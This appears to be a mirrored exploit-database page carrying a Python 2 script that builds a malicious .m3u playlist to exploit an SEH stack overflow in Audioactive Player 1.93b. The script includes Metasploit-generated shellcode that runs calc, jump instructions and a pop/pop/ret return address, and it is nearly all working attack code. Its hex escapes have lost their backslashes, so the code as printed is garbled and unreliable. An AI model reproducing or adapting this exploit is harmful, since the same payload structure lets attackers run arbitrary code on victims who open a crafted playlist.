Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)
# Published : 2009-05-15
# Author : His0k4
# Previous Title : WM Downloader 3.0.0.9 .m3u Universal Stack Overflow Exploit
# Next Title : Linux Kernel 2.6.29 ptrace_attach() Local Root Race Condition Exploit

#usage: exploit.py
#Open the program then double clic in the exploit file
print "**************************************************************************"
print " Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)n"
print " Credits : hack4loven"
print " Seh Exploit: His0k4n"
print " Tested on: Windows XP Pro SP3 (EN)n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.comn"
print "**************************************************************************"       
			
# win32_exec -  EXITFUNC=seh CMD=calc Size=165 Encoder=JmpCallAdditive http://metasploit.com
shellcode=(
"xfcxbbx5dx53x65x97xebx0cx5ex56x31x1exadx01xc3x85"
"xc0x75xf7xc3xe8xefxffxffxffxa1xbbx21x97x59x3cx21"
"xd2x65xb7x49xd8xedxc6x5ex69x42xd1x2bx31x7cxe0xc0"
"x87xf7xd6x9dx19xe9x26x62x80x59xccxa2xc7xa6x0cxe8"
"x25xa9x4cx06xc1x92x04xfdx2ex91x41x76x71x7dx8bx62"
"xe8xf6x87x3fx7ex57x84xbex6bxecxa8x4bx6ax19x59x17"
"x49xd9x99x99x51x85x96x9ax61xc0x69x62x8ex41x29x9f"
"x05x25xb6x32x92xadxcexa7xacxa6x4fx87xafxb8x4fx63"
"xc7x84x10x42xeex94xf8x2dxf6xd7xc5x55x57xbfx35x23"
"x53x60xdexacxa2x14x10x9axa5xcfx4ex45x36x6cx91x85"
"xc6x72x91x85xc6")

payload = "x41"*(589-len(shellcode))
payload += shellcode
payload += "xE9x56xFFxFFxFF" # go back
payload += "x74xF9xFFxFF" #go back
payload += "xDEx19xD1x72" # Friendly p/p/r msacm32.drv
payload += "x44"*900

try:
    out_file = open("exploit.m3u",'w')
    out_file.write("http://www.google.com/"+payload+".mp3rn")
    out_file.close()
    raw_input("nExploit file created!n")
except:
    print "Error"

# www.Syue.com [2009-05-15]